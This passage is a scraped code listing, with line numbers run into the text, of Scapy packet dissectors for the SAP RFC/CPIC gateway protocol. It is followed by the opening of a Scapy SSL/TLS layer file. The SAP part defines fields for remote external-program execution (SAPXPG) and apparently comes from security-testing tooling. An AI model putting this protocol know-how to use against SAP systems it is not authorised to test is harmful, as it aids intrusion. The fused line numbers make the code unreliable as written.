cpic_padd["cpic_unk4_padd"]),544 # StrFixedLenField("cpic_padd020", "", length=4), #TODO: we send this field in originak request545 # ConditionalField(FieldLenField("cpic_th_struct_len", None, length_of="cpic_th_struct", fmt="!H"), lambda pkt: pkt.cpic_padd020 == cpic_padd["cpic_th_struct_padd"]),546 # ConditionalField(PacketListField("cpic_th_struct", None, SAPRFCTHStruct, length_from=lambda pkt: pkt.cpic_th_struct_len), lambda pkt: pkt.cpic_padd020 == cpic_padd["cpic_th_struct_padd"]),547 StrFixedLenField("cpic_padd021", "", length=4),548 ConditionalField(FieldLenField("cpic_some_params2_len", None, length_of="some_cpic_params2", fmt="!H"), lambda pkt: pkt.cpic_padd021[2:] == cpic_padd["cpic_some_params2_padd"][2:]),549 ConditionalField(PacketListField("some_cpic_params2", None, SAPCPICPARAM2, length_from=lambda pkt: pkt.cpic_some_params2_len), lambda pkt: pkt.cpic_padd021[2:] == cpic_padd["cpic_some_params2_padd"][2:]),550 StrFixedLenField("cpic_padd022", "", length=4),551 ConditionalField(FieldLenField("cpic_unk6_len", None, length_of="cpic_unk6", fmt="!H"), lambda pkt: pkt.cpic_padd022 == cpic_padd["cpic_unk6_padd"]),552 ConditionalField(StrLenField("cpic_unk6", "", length_from=lambda pkt: pkt.cpic_unk6_len), lambda pkt: pkt.cpic_padd022 == cpic_padd["cpic_unk6_padd"]),553 StrFixedLenField("cpic_padd023", "", length=4),554 ConditionalField(FieldLenField("cpic_unk7_len", None, length_of="cpic_unk7", fmt="!H"), lambda pkt: pkt.cpic_padd023 == cpic_padd["cpic_unk7_padd"]),555 ConditionalField(StrLenField("cpic_unk7", "", length_from=lambda pkt: pkt.cpic_unk7_len), lambda pkt: pkt.cpic_padd023 == cpic_padd["cpic_unk7_padd"]),556 # Started PRG SAPXPG_START_XPG_LONG557 ConditionalField(PacketField("xpg_p", None, SAPRFXPG), lambda pkt: pkt.cpic_RFC_f == 'SAPXPG_START_XPG_LONG'),558 # End559 ConditionalField(PacketField("xpg_end", None, SAPRFXPG_END), lambda pkt: pkt.cpic_RFC_f in ['SAPXPG_END_XPG']),560 # Started PRG RFC_PING561 ConditionalField(PacketField("rfc_ping", None, SAPRFCPING), lambda pkt: pkt.cpic_RFC_f in ['RFC_PING']),562 StrFixedLenField("cpic_padd024", "", length=4),563 ConditionalField(FieldLenField("cpic_suff_len", None, length_of="cpic_suff", fmt="!H"), lambda pkt: pkt.cpic_padd024 == cpic_padd["cpic_suff_padd"]),564 ConditionalField(PacketListField("cpic_suff", None, SAPCPICSUFFIX, length_from=lambda pkt: pkt.cpic_suff_len), lambda pkt: pkt.cpic_padd024 == cpic_padd["cpic_suff_padd"]),565 StrFixedLenField("cpic_end_padd", "", length=4),566 ConditionalField(FieldLenField("cpic_end_len", None, length_of="cpic_end", fmt="!H"), lambda pkt: pkt.cpic_end_padd == cpic_padd["cpic_end_padd"]),567 ConditionalField(StrLenField("cpic_end", "", length_from=lambda pkt: pkt.cpic_end_len), lambda pkt: pkt.cpic_end_padd == cpic_padd["cpic_end_padd"]),568 StrFixedLenField("cpic_end_sig", "\x00\x00\xff\xff", length=4),569 ]570class SAPCPIC(PacketNoPadded):571 """SAP CPIC Packet572 """573 name = "SAP CPIC Packet"574 fields_desc = [575 StrFixedLenField("cpic_start_padd","", length=4),576 ConditionalField( ShortField("cpic_cpic_length", None), lambda pkt: pkt.cpic_start_padd== cpic_padd["cpic_start_padd"]), # don't no what it is577 StrFixedLenField("cpic_padd0003", "", length=4),578 ConditionalField(FieldLenField("cpic_unk02_len", None, length_of="cpic_unk02", fmt="!H"), lambda pkt: pkt.cpic_padd0003 == cpic_padd["cpic_unk02_padd"]),579 ConditionalField(StrLenField("cpic_unk02", "", length_from=lambda pkt: pkt.cpic_unk02_len), lambda pkt: pkt.cpic_padd0003 == cpic_padd["cpic_unk02_padd"]),580 StrFixedLenField("cpic_padd0002", "", length=4),581 ConditionalField(FieldLenField("cpic_unk01_len", None, length_of="cpic_unk01", fmt="!H"), lambda pkt: pkt.cpic_padd0002 == cpic_padd["cpic_unk01_padd"]),582 ConditionalField(StrLenField("cpic_unk01", "", length_from=lambda pkt: pkt.cpic_unk01_len), lambda pkt: pkt.cpic_padd0002 == cpic_padd["cpic_unk01_padd"]),583 StrFixedLenField("cpic_padd0001", "", length=4),584 ConditionalField(FieldLenField("cpic_unk00_len", None, length_of="cpic_unk00", fmt="!H"), lambda pkt: pkt.cpic_padd0001 == cpic_padd["cpic_unk00_padd"]),585 ConditionalField(StrLenField("cpic_unk00", "", length_from=lambda pkt: pkt.cpic_unk00_len), lambda pkt: pkt.cpic_padd0001 == cpic_padd["cpic_unk00_padd"]),586 StrFixedLenField("cpic_padd001", "", length=4),587 ConditionalField(FieldLenField("cpic_ip_len", None, length_of="cpic_ip", fmt="!H"), lambda pkt: pkt.cpic_padd001 == cpic_padd["cpic_ip_padd"]),588 ConditionalField(StrLenField("cpic_ip", "", length_from=lambda pkt: pkt.cpic_ip_len), lambda pkt: pkt.cpic_padd001 == cpic_padd["cpic_ip_padd"]),589 StrFixedLenField("cpic_padd002", "", length=4),590 ConditionalField(FieldLenField("cpic_ip2_len", None, length_of="cpic_ip2", fmt="!H"),lambda pkt: pkt.cpic_padd002 == cpic_padd["cpic_ip_padd2"]),591 ConditionalField(StrLenField("cpic_ip2", "", length_from=lambda pkt: pkt.cpic_ip2_len),lambda pkt: pkt.cpic_padd002 == cpic_padd["cpic_ip_padd2"]),592 StrFixedLenField("cpic_padd003", "", length=4),593 ConditionalField(FieldLenField("cpic_host_sid_inbr_len", None, length_of="cpic_host_sid_inbr", fmt="!H"), lambda pkt: pkt.cpic_padd003 == cpic_padd["cpic_host_sid_inbr_padd"]),594 ConditionalField(StrLenField("cpic_host_sid_inbr", "", length_from=lambda pkt: pkt.cpic_host_sid_inbr_len), lambda pkt: pkt.cpic_padd003 == cpic_padd["cpic_host_sid_inbr_padd"]),595 StrFixedLenField("cpic_padd004", "", length=4),596 ConditionalField(FieldLenField("cpic_rfc_type_len", None, length_of="cpic_rfc_type", fmt="!H"), lambda pkt: pkt.cpic_padd004 == cpic_padd["cpic_rfc_type_padd"]),597 ConditionalField(StrLenField("cpic_rfc_type", "", length_from=lambda pkt: pkt.cpic_rfc_type_len), lambda pkt: pkt.cpic_padd004 == cpic_padd["cpic_rfc_type_padd"]),598 StrFixedLenField("cpic_padd005", "", length=4),599 ConditionalField(FieldLenField("cpic_kernel1_len", None, length_of="cpic_kernel1", fmt="!H"), lambda pkt: pkt.cpic_padd005 == cpic_padd["cpic_kernel1_padd"]),600 ConditionalField(StrLenField("cpic_kernel1", "", length_from=lambda pkt: pkt.cpic_kernel1_len), lambda pkt: pkt.cpic_padd005 == cpic_padd["cpic_kernel1_padd"]),601 StrFixedLenField("cpic_padd006", "", length=4),602 ConditionalField(FieldLenField("cpic_kernel2_len", None, length_of="cpic_kernel2", fmt="!H"), lambda pkt: pkt.cpic_padd006 == cpic_padd["cpic_kernel2_padd"]),603 ConditionalField(StrLenField("cpic_kernel2", "", length_from=lambda pkt: pkt.cpic_kernel2_len), lambda pkt: pkt.cpic_padd006 == cpic_padd["cpic_kernel2_padd"]),604 StrFixedLenField("cpic_padd007", "", length=4),605 ConditionalField(FieldLenField("cpic_dest_len", None, length_of="cpic_dest", fmt="!H"), lambda pkt: pkt.cpic_padd007 == cpic_padd["cpic_dest_padd"]),606 ConditionalField(StrLenField("cpic_dest", "", length_from=lambda pkt: pkt.cpic_dest_len), lambda pkt: pkt.cpic_padd007 == cpic_padd["cpic_dest_padd"]),607 StrFixedLenField("cpic_padd008", "", length=4),608 ConditionalField(FieldLenField("cpic_program_len", None, length_of="cpic_program", fmt="!H"), lambda pkt: pkt.cpic_padd008 == cpic_padd["cpic_program_padd"]),609 ConditionalField(StrLenField("cpic_program", "", length_from=lambda pkt: pkt.cpic_program_len), lambda pkt: pkt.cpic_padd008 == cpic_padd["cpic_program_padd"]),610 StrFixedLenField("cpic_padd009", "", length=4),611 ConditionalField(FieldLenField("cpic_username1_len", None, length_of="cpic_username1", fmt="!H"), lambda pkt: pkt.cpic_padd009 == cpic_padd["cpic_username1_padd"]),612 ConditionalField(StrLenField("cpic_username1", "", length_from=lambda pkt: pkt.cpic_username1_len), lambda pkt: pkt.cpic_padd009 == cpic_padd["cpic_username1_padd"]),613 StrFixedLenField("cpic_padd010", "", length=4),614 ConditionalField(FieldLenField("cpic_cli_nbr1_len", None, length_of="cpic_cli_nbr1", fmt="!H"), lambda pkt: pkt.cpic_padd010 == cpic_padd["cpic_cli_nbr1_padd"]),615 ConditionalField(StrLenField("cpic_cli_nbr1", "", length_from=lambda pkt: pkt.cpic_cli_nbr1_len), lambda pkt: pkt.cpic_padd010 == cpic_padd["cpic_cli_nbr1_padd"]),616 StrFixedLenField("cpic_padd011", "", length=4),617 ConditionalField(FieldLenField("cpic_unk1_len", None, length_of="cpic_unk1", fmt="!H"), lambda pkt: pkt.cpic_padd011 == cpic_padd["cpic_unk1_padd"]),618 ConditionalField(StrLenField("cpic_unk1", "", length_from=lambda pkt: pkt.cpic_unk1_len), lambda pkt: pkt.cpic_padd011 == cpic_padd["cpic_unk1_padd"]),619 StrFixedLenField("cpic_padd012", "", length=4),620 ConditionalField(FieldLenField("cpic_username2_len", None, length_of="cpic_username2", fmt="!H"), lambda pkt: pkt.cpic_padd012 == cpic_padd["cpic_username2_padd"]),621 ConditionalField(StrLenField("cpic_username2", "", length_from=lambda pkt: pkt.cpic_username2_len), lambda pkt: pkt.cpic_padd012 == cpic_padd["cpic_username2_padd"]),622 StrFixedLenField("cpic_padd013", "", length=4),623 ConditionalField(FieldLenField("cpic_cli_nbr2_len", None, length_of="cpic_cli_nbr2", fmt="!H"), lambda pkt: pkt.cpic_padd013 == cpic_padd["cpic_cli_nbr2_padd"]),624 ConditionalField(StrLenField("cpic_cli_nbr2", "", length_from=lambda pkt: pkt.cpic_cli_nbr2_len), lambda pkt: pkt.cpic_padd013 == cpic_padd["cpic_cli_nbr2_padd"]),625 StrFixedLenField("cpic_padd014", "", length=4),626 ConditionalField(FieldLenField("cpic_unk2_len", None, length_of="cpic_unk2", fmt="!H"), lambda pkt: pkt.cpic_padd014 == cpic_padd["cpic_unk2_padd"]),627 ConditionalField(StrLenField("cpic_unk2", "", length_from=lambda pkt: pkt.cpic_unk2_len), lambda pkt: pkt.cpic_padd014 == cpic_padd["cpic_unk2_padd"]),628 # dirty fix for the last packet629 StrFixedLenField("cpic_padd015_0", "", length=2), # <---- last packets starts here630 StrFixedLenField("cpic_padd015_1", "", length=2),631 ConditionalField(FieldLenField("cpic_some_params_len", None, length_of="some_cpic_params", fmt="!H"), lambda pkt: pkt.cpic_padd015_1 == cpic_padd["cpic_some_params_1_padd"]),632 ConditionalField(PacketListField("some_cpic_params",None, SAPCPICPARAM, length_from=lambda pkt: pkt.cpic_some_params_len), lambda pkt: pkt.cpic_padd015_1 == cpic_padd["cpic_some_params_1_padd"]),633 StrFixedLenField("cpic_padd016", "", length=4),634 ConditionalField(FieldLenField("cpic_convid_label_len", None, length_of="cpic_convid_label", fmt="!H"), lambda pkt: pkt.cpic_padd016 == cpic_padd["cpic_convid_label_padd"]),635 ConditionalField(StrLenField("cpic_convid_label", "", length_from=lambda pkt: pkt.cpic_convid_label_len), lambda pkt: pkt.cpic_padd016 == cpic_padd["cpic_convid_label_padd"]),636 StrFixedLenField("cpic_padd017", "", length=4),637 ConditionalField(FieldLenField("cpic_kernel3_len", None, length_of="cpic_kernel3", fmt="!H"), lambda pkt: pkt.cpic_padd017 == cpic_padd["cpic_kernel3_padd"]),638 ConditionalField(StrLenField("cpic_kernel3", "", length_from=lambda pkt: pkt.cpic_kernel3_len), lambda pkt: pkt.cpic_padd017 == cpic_padd["cpic_kernel3_padd"]),639 StrFixedLenField("cpic_padd018", "", length=4),640 ConditionalField(FieldLenField("cpic_RFC_f_len", None, length_of="cpic_RFC_f", fmt="!H"), lambda pkt: pkt.cpic_padd018 == cpic_padd["cpic_RFC_f_padd"]),641 ConditionalField(StrLenField("cpic_RFC_f", "", length_from=lambda pkt: pkt.cpic_RFC_f_len), lambda pkt: pkt.cpic_padd018 == cpic_padd["cpic_RFC_f_padd"]),642 StrFixedLenField("cpic_padd019", "", length=4),643 ConditionalField(FieldLenField("cpic_unk4_len", None, length_of="cpic_unk4", fmt="!H"), lambda pkt: pkt.cpic_padd019 == cpic_padd["cpic_unk4_padd"]),644 ConditionalField(StrLenField("cpic_unk4", "", length_from=lambda pkt: pkt.cpic_unk4_len), lambda pkt: pkt.cpic_padd019 == cpic_padd["cpic_unk4_padd"]),645 StrFixedLenField("cpic_padd020", "", length=4),646 ConditionalField(FieldLenField("cpic_th_struct_len", None, length_of="cpic_th_struct", fmt="!H"), lambda pkt: pkt.cpic_padd020 == cpic_padd["cpic_th_struct_padd"]),647 ConditionalField(PacketListField("cpic_th_struct", None, SAPRFCTHStruct, length_from=lambda pkt: pkt.cpic_th_struct_len), lambda pkt: pkt.cpic_padd020 == cpic_padd["cpic_th_struct_padd"]),648 StrFixedLenField("cpic_padd021", "", length=4),649 ConditionalField(FieldLenField("cpic_some_params2_len", None, length_of="some_cpic_params2", fmt="!H"), lambda pkt: pkt.cpic_padd021 == cpic_padd["cpic_some_params2_padd"]),650 ConditionalField(PacketListField("some_cpic_params2", None, SAPCPICPARAM2, length_from=lambda pkt: pkt.cpic_some_params2_len), lambda pkt: pkt.cpic_padd021 == cpic_padd["cpic_some_params2_padd"]),651 StrFixedLenField("cpic_padd022", "", length=4),652 ConditionalField(FieldLenField("cpic_unk6_len", None, length_of="cpic_unk6", fmt="!H"), lambda pkt: pkt.cpic_padd022 == cpic_padd["cpic_unk6_padd"]),653 ConditionalField(StrLenField("cpic_unk6", "", length_from=lambda pkt: pkt.cpic_unk6_len), lambda pkt: pkt.cpic_padd022 == cpic_padd["cpic_unk6_padd"]),654 StrFixedLenField("cpic_padd023", "", length=4),655 ConditionalField(FieldLenField("cpic_unk7_len", None, length_of="cpic_unk7", fmt="!H"), lambda pkt: pkt.cpic_padd023 == cpic_padd["cpic_unk7_padd"]),656 ConditionalField(StrLenField("cpic_unk7", "", length_from=lambda pkt: pkt.cpic_unk7_len), lambda pkt: pkt.cpic_padd023 == cpic_padd["cpic_unk7_padd"]),657 # Started PRG SAPXPG_START_XPG_LONG658 ConditionalField(PacketField("xpg_p", None, SAPRFXPG), lambda pkt: pkt.cpic_RFC_f == 'SAPXPG_START_XPG_LONG'),659 # Started PRG RFC_PING660 ConditionalField(PacketField("rfc_ping", None, SAPRFCPING), lambda pkt: pkt.cpic_RFC_f == 'RFC_PING'),661 StrFixedLenField("cpic_padd024", "", length=4),662 ConditionalField(FieldLenField("cpic_suff_len", None, length_of="cpic_suff", fmt="!H"), lambda pkt: pkt.cpic_padd024 == cpic_padd["cpic_suff_padd"]),663 ConditionalField(PacketListField("cpic_suff", None, SAPCPICSUFFIX, length_from=lambda pkt: pkt.cpic_suff_len), lambda pkt: pkt.cpic_padd024 == cpic_padd["cpic_suff_padd"]),664 StrFixedLenField("cpic_end_padd", "", length=4),665 ConditionalField(FieldLenField("cpic_end_len", None, length_of="cpic_end", fmt="!H"), lambda pkt: pkt.cpic_end_padd == cpic_padd["cpic_end_padd"]),666 ConditionalField(StrLenField("cpic_end", "", length_from=lambda pkt: pkt.cpic_end_len), lambda pkt: pkt.cpic_end_padd == cpic_padd["cpic_end_padd"]),667 StrFixedLenField("cpic_end_sig", "\x00\x00\xff\xff", length=4),668 ]669class SAPCPIC_CUT(PacketNoPadded):670 """SAP RFC TH structure.671 """672 name = "SAP CUT"673 fields_desc = [674 # StrLenField("keke1", ""),675 StrFixedLenField("keke1", "",475),676 ]677class SAPRFC(PacketNoPadded):678 """SAP Remote Function Call packet679 This packet is used for the Remote Function Call (RFC) protocol.680 """681 fields_desc = [682 ByteField("version", 3), # If the version is 3, the packet has a size > 88h, versions 1 and 2 are 40h683 ConditionalField(ByteEnumKeysField("req_type", 0, rfc_req_type_values), lambda pkt: pkt.version != 0x06),684 ConditionalField(ByteEnumKeysField("func_type", 0, rfc_func_type_values), lambda pkt: pkt.version == 0x06),685 # Normal client fields (GW_NORMAL_CLIENT)686 ConditionalField(IPField("address", "0.0.0.0"), lambda pkt: pkt.req_type == 0x03),687 ConditionalField(IntField("padd1", 0), lambda pkt: pkt.req_type == 0x03),688 ConditionalField(StrFixedLenPaddedField("service", "", length=10), lambda pkt: pkt.req_type == 0x03),689 ConditionalField(StrFixedLenField("codepage", "1100", length=4), lambda pkt: pkt.req_type == 0x03),690 ConditionalField(StrFixedLenField("padd2", "\x00" * 6, length=6), lambda pkt: pkt.req_type == 0x03),691 ConditionalField(StrFixedLenPaddedField("lu", "", length=8), lambda pkt: pkt.req_type == 0x03),692 ConditionalField(StrFixedLenPaddedField("tp", "", length=8), lambda pkt: pkt.req_type == 0x03),693 ConditionalField(StrFixedLenPaddedField("conversation_id", "", length=8), lambda pkt: pkt.req_type == 0x03),694 ConditionalField(ByteField("appc_header_version", 6), lambda pkt: pkt.req_type == 0x03),695 # ConditionalField(ByteField("accept_info", 0xcb), lambda pkt:pkt.req_type == 0x03),696 ConditionalField(FlagsField("accept_info", 0xcb, 8,697 ["EINFO", "PING", "SNC", "CONN_EINFO", "CODE_PAGE", "NIPING", "EXTINITOPT",698 "GW_ACCEPT_DIST_TRACE"]), lambda pkt: pkt.req_type == 0x03), # chipik699 ConditionalField(SignedShortField("idx", -1), lambda pkt: pkt.req_type == 0x03),700 ConditionalField(IP6Field("address6", "::"), lambda pkt: pkt.req_type == 0x03 and pkt.version == 3),701 ConditionalField(IntField("rc", 0), lambda pkt: pkt.req_type == 0x03),702 ConditionalField(ByteField("echo_data", 0), lambda pkt: pkt.req_type == 0x03),703 ConditionalField(ByteField("filler", 0), lambda pkt: pkt.req_type == 0x03),704 # Monitor Command fields (GW_SEND_CMD)705 ConditionalField(ByteEnumKeysField("cmd", 0, rfc_monitor_cmd_values), lambda pkt: pkt.req_type == 0x09),706 # General padding for non implemented request types707 ConditionalField(StrFixedLenField("padd_v12", "\x00" * 61, length=61),708 lambda pkt: pkt.version < 3 and pkt.req_type == 0x09),709 ConditionalField(StrFixedLenField("padd_v12", "\x00" * 62, length=62),710 lambda pkt: pkt.version < 3 and pkt.req_type not in [0x03, 0x09]),711 ConditionalField(StrFixedLenField("padd_v3", "\x00" * 133, length=133),712 lambda pkt: pkt.version == 3 and pkt.req_type == 0x09),713 ConditionalField(StrFixedLenField("padd_v3", "\x00" * 134, length=134),714 lambda pkt: pkt.version == 3 and pkt.req_type not in [0x03, 0x09]),715 # APPC layer POC for remote function call716 ConditionalField(ByteEnumKeysField("protocol", 0x3, appc_protocol_values), lambda pkt: pkt.version == 0x6),717 ConditionalField(ByteField("mode", 0x0), lambda pkt: pkt.version == 0x6),718 ConditionalField(ShortField("uid", 0x13), lambda pkt: pkt.version == 0x6),719 ConditionalField(ShortField("gw_id", 0x0), lambda pkt: pkt.version == 0x6),720 ConditionalField(ShortField("err_len", 0x0), lambda pkt: pkt.version == 0x6),721 # ConditionalField(ByteField("info2", 0x1), lambda pkt:pkt.version == 0x6), # bitfield722 ConditionalField(FlagsField("info2", 0, 8,723 ["WITH_LONG_LU_NAME", "GW_IMMEDIATE", "GW_SNC_ACTIVE", "GW_WAIT_LOOK_UP",724 "SNC_INIT_PHASE", "GW_STATELESS"]), lambda pkt: pkt.version == 0x6), # chipik725 ConditionalField(ByteField("trace_level", 0x1), lambda pkt: pkt.version == 0x6),726 ConditionalField(IntField("time", 0x0), lambda pkt: pkt.version == 0x6),727 # ConditionalField(ByteField("info3", 0x0), lambda pkt:pkt.version == 0x6), # bitfield728 ConditionalField(FlagsField("info3", 0, 8,729 ["GW_WITH_CODE_PAGE", "GW_ASYNC_RFC", "GW_CANCEL_HARD", "GW_CANCEL_SOFT",730 "GW_WITH_GUI_TIMEOUT", "GW_TERMIO_ERROR", "GW_EXTENDED_INIT_OPTIONS",731 "GW_DIST_TRACE"]), lambda pkt: pkt.version == 0x6), # chipik732 ConditionalField(SignedIntField("timeout", -1), lambda pkt: pkt.version == 0x6),733 ConditionalField(ByteField("info4", 0x0), lambda pkt: pkt.version == 0x6), # bitfield734 ConditionalField(IntField("seq_no", 0x0), lambda pkt: pkt.version == 0x6),735 ConditionalField(FieldLenField("sap_param_len", None, length_of="sap_param", fmt="!H"),736 lambda pkt: pkt.version == 0x6),737 ConditionalField(ByteField("padd_appc", 0x0), lambda pkt: pkt.version == 0x6), # bitfield738 ConditionalField(FlagsField("info", 0, 16,739 ["SYNC_CPIC_FUNCTION", "WITH_HOSTADDR", "WITH_GW_SAP_PARAMS_HDR", "CPIC_SYNC_REQ",740 "WITH_ERR_INFO", "DATA_WITH_TERM_OUTPUT", "DATA_WITH_TERM_INPUT",741 "R3_CPIC_LOGIN_WITH_TERM"]), lambda pkt: pkt.version == 0x6), # chipik C742 ConditionalField(FlagsField("vector", 0, 8,743 ["F_V_INITIALIZE_CONVERSATION", "F_V_ALLOCATE", "F_V_SEND_DATA", "F_V_RECEIVE",744 "F_V_FLUSH"]), lambda pkt: pkt.version == 0x6), # chipik C745 ConditionalField(IntEnumKeysField("appc_rc", 0x0, appc_rc_values), lambda pkt: pkt.version == 0x6),746 ConditionalField(IntEnumKeysField("sap_rc", 0x0, sap_rc_values), lambda pkt: pkt.version == 0x6),747 ConditionalField(StrFixedLenField("conv_id", 0, 8), lambda pkt: pkt.version == 0x6),748 ConditionalField(PacketField("sap_ext_header", None, SAPRFCEXTEND), lambda pkt: pkt.version == 0x6 and 'GW_EXTENDED_INIT_OPTIONS' in str(pkt.info3)), # chipik749 ConditionalField(StrFixedLenField("cm_ok_padd", 0, 32),lambda pkt: pkt.version == 0x6 and "SYNC_CPIC_FUNCTION" in str(pkt.info) and "GW_WITH_CODE_PAGE" not in str(pkt.info3)), # chipik750 ConditionalField(IntField("codepage_size1", 0,),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik751 ConditionalField(StrFixedLenField("codepage_padd1", 0, 4),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik752 ConditionalField(IntField("codepage_size2", 0,),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik753 ConditionalField(StrFixedLenField("codepage_padd2", 0, 4),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik754 ConditionalField(StrFixedLenField("codepage_padd3", 0, 4),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik755 ConditionalField(StrFixedLenField("codepage", 0, 5),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik756 ConditionalField(StrFixedLenField("codepage_padd2", 0, 7),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik757 ConditionalField(PacketField("sap_param", None, SAPRFCDTStruct), lambda pkt: pkt.version == 0x6 and 'GW_DIST_TRACE' in str(pkt.info3)), # chipik758 # error message759 ConditionalField(StrField("error_msg", ""),lambda pkt: pkt.version == 0x6 and 'WITH_ERR_INFO' in str(pkt.info)),760 # F_V_SEND_DATA761 ConditionalField(PacketField("sap_cpic", None, SAPCPIC),lambda pkt: pkt.version == 0x6 and 'F_V_SEND_DATA' in str(pkt.vector) and not pkt.codepage_size2), # chipik762 ConditionalField(PacketField("sap_cpic_cut", None, SAPCPIC2),lambda pkt: pkt.version == 0x6 and 'F_V_SEND_DATA' in str(pkt.vector) and not pkt.codepage_size2 and not pkt.sap_cpic), # chipik763 # answer from Anon GW764 ConditionalField(StrFixedLenField("anon_repl_sign",'\x05\x00\x00\x00', 4),lambda pkt: pkt.version == 0x6 and 'F_V_RECEIVE' == str(pkt.vector)),765 ConditionalField(PacketListField("repl", None, DEF_FIELDS, length_from=lambda pkt: pkt.codepage_size2),lambda pkt: pkt.version == 0x6 and 'F_V_RECEIVE' in str(pkt.vector) and pkt.codepage_size2>0),766 ConditionalField(ShortField("cpic_packet_size", 0x0),lambda pkt: pkt.version == 0x6 and 'F_V_SEND_DATA' in str(pkt.vector)), # chipik767 ConditionalField(IntField("rfc_packet_size", 0x0),lambda pkt: pkt.version == 0x6 and 'F_V_SEND_DATA' in str(pkt.vector)), # chipik768 ]769 name = "SAP Remote Function Call"770# Bind SAP NI with the RFC port...
ssl_tls.py
Source:ssl_tls.py
1#! /usr/bin/env python2# -*- coding: UTF-8 -*-3# Author : tintinweb@oststrom.com <github.com/tintinweb>4# http://www.secdev.org/projects/scapy/doc/build_dissect.html5from scapy.packet import Packet, bind_layers6from scapy.fields import *7from scapy.layers.inet import TCP, UDP8import os, time9class BLenField(LenField):10 def __init__(self, name, default, fmt="I", adjust_i2m=lambda pkt, x:x, numbytes=None, length_of=None, count_of=None, adjust_m2i=lambda pkt, x:x):11 self.name = name12 self.adjust_i2m = adjust_i2m13 self.adjust_m2i = adjust_m2i14 self.numbytes = numbytes15 self.length_of = length_of16 self.count_of = count_of17 LenField.__init__(self, name, default, fmt)18 if fmt[0] in "@=<>!":19 self.fmt = fmt20 else:21 self.fmt = "!" + fmt22 self.default = self.any2i(None, default)23 self.sz = struct.calcsize(self.fmt) if not numbytes else numbytes24 self.owners = []25 26 def addfield(self, pkt, s, val):27 """Add an internal value to a string"""28 pack = struct.pack(self.fmt, self.i2m(pkt, val))29 if self.numbytes:30 pack = pack[len(pack) - self.numbytes:]31 return s + pack32 def getfield(self, pkt, s):33 """Extract an internal value from a string"""34 upack_data = s[:self.sz]35 # prepend struct.calcsize()-len(data) bytes to satisfy struct.unpack36 upack_data = '\x00' * (struct.calcsize(self.fmt) - self.sz) + upack_data37 38 return s[self.sz:], self.m2i(pkt, struct.unpack(self.fmt, upack_data)[0])39 40 def i2m(self, pkt, x):41 if x is None:42 if not (self.length_of or self.count_of):43 x = len(pkt.payload)44 x = self.adjust_i2m(pkt, x)45 return x46 47 if self.length_of is not None:48 fld, fval = pkt.getfield_and_val(self.length_of)49 f = fld.i2len(pkt, fval)50 else:51 fld, fval = pkt.getfield_and_val(self.count_of)52 f = fld.i2count(pkt, fval)53 x = self.adjust_i2m(pkt, f)54 return x55 def m2i(self, pkt, x):56 return self.adjust_m2i(pkt, x)57class XBLenField(BLenField):58 def i2repr(self, pkt, x):59 return lhex(self.i2h(pkt, x))60 61class XLenField(LenField):62 def i2repr(self, pkt, x):63 return lhex(self.i2h(pkt, x))64 65class XFieldLenField(FieldLenField):66 def i2repr(self, pkt, x):67 return lhex(self.i2h(pkt, x)) 68 69class BEnumField(EnumField):70 def __init__(self, name, default, enum, fmt="!I", numbytes=None):71 EnumField.__init__(self, name, default, enum, fmt)72 self.numbytes = numbytes73 74 self.name = name75 if fmt[0] in "@=<>!":76 self.fmt = fmt77 else:78 self.fmt = "!" + fmt79 self.default = self.any2i(None, default)80 self.sz = struct.calcsize(self.fmt) if not numbytes else numbytes81 self.owners = []82 def addfield(self, pkt, s, val):83 """Add an internal value to a string"""84 pack = struct.pack(self.fmt, self.i2m(pkt, val))85 if self.numbytes:86 pack = pack[len(pack) - self.numbytes:]87 return s + pack88 def getfield(self, pkt, s):89 """Extract an internal value from a string"""90 upack_data = s[:self.sz]91 # prepend struct.calcsize()-len(data) bytes to satisfy struct.unpack92 upack_data = '\x00' * (struct.calcsize(self.fmt) - self.sz) + upack_data93 94 return s[self.sz:], self.m2i(pkt, struct.unpack(self.fmt, upack_data)[0])95 96 def i2repr_one(self, pkt, x):97 if self not in conf.noenum and not isinstance(x, VolatileValue) and x in self.i2s:98 return self.i2s[x]99 return lhex(x)100class XBEnumField(BEnumField):101 def i2repr(self, pkt, x):102 return lhex(self.i2h(pkt, x)) 103 104TLS_VERSIONS = { 0x0002:"SSL_2_0",105 0x0300:"SSL_3_0",106 0x0301:"TLS_1_0",107 0x0302:"TLS_1_1",108 0x0303:"TLS_1_2",109 110 0x0100:"PROTOCOL_DTLS_1_0_OPENSSL_PRE_0_9_8f",111 0xfeff:"DTLS_1_0",112 0xfefd:"DTLS_1_1",113 114 }115TLS_CONTENT_TYPES = {0x14:"change_cipher_spec",116 0x15:"alert",117 0x16:"handshake",118 0x17:"application_data",119 0x18:"heartbeat",120 0xff:"unknown"}121TLS_HANDSHAKE_TYPES = {0x00:"hello_request",122 0x01:"client_hello",123 0x02:"server_hello",124 0x0b:"certificate",125 0x0c:"server_key_exchange",126 0x0d:"certificate_request",127 0x0e:"server_hello_done",128 0x0f:"certificate_verify",129 0x10:"client_key_exchange",130 0x20:"finished",131 0x21:"certificate_url",132 0x22:"certificate_stats",133 0xff:"unknown"}134TLS_EXTENSION_TYPES = {135 0x0000:"server_name",136 0x0001:"max_fragment_length",137 0x0002:"client_certificate_url",138 0x0003:"trusted_ca_keys",139 0x0004:"truncated_hmac",140 0x0005:"status_request",141 0x000a:"elliptic_curves",142 0x000b:"ec_point_formats",143 0x000d:"signature_algorithms",144 0x000f:"heartbeat",145 0x0023:"session_ticket_tls",146 0x3374:"next_protocol_negotiation",147 0xff01:"renegotiationg_info",148 }149TLS_ALERT_LEVELS = { 0x01: "warning",150 0x02: "fatal",151 0xff: "unknown", }152TLS_ALERT_DESCRIPTIONS = { 153 0:"CLOSE_NOTIFY",154 10:"UNEXPECTE_MESSAGE",155 20:"BAD_RECORD_MAC",156 21:"DESCRIPTION_FAILED_RESERVED",157 22:"RECORD_OVERFLOW",158 30:"DECOMPRESSION_FAILURE",159 40:"HANDSHAKE_FAILURE",160 41:"NO_CERTIFICATE_RESERVED",161 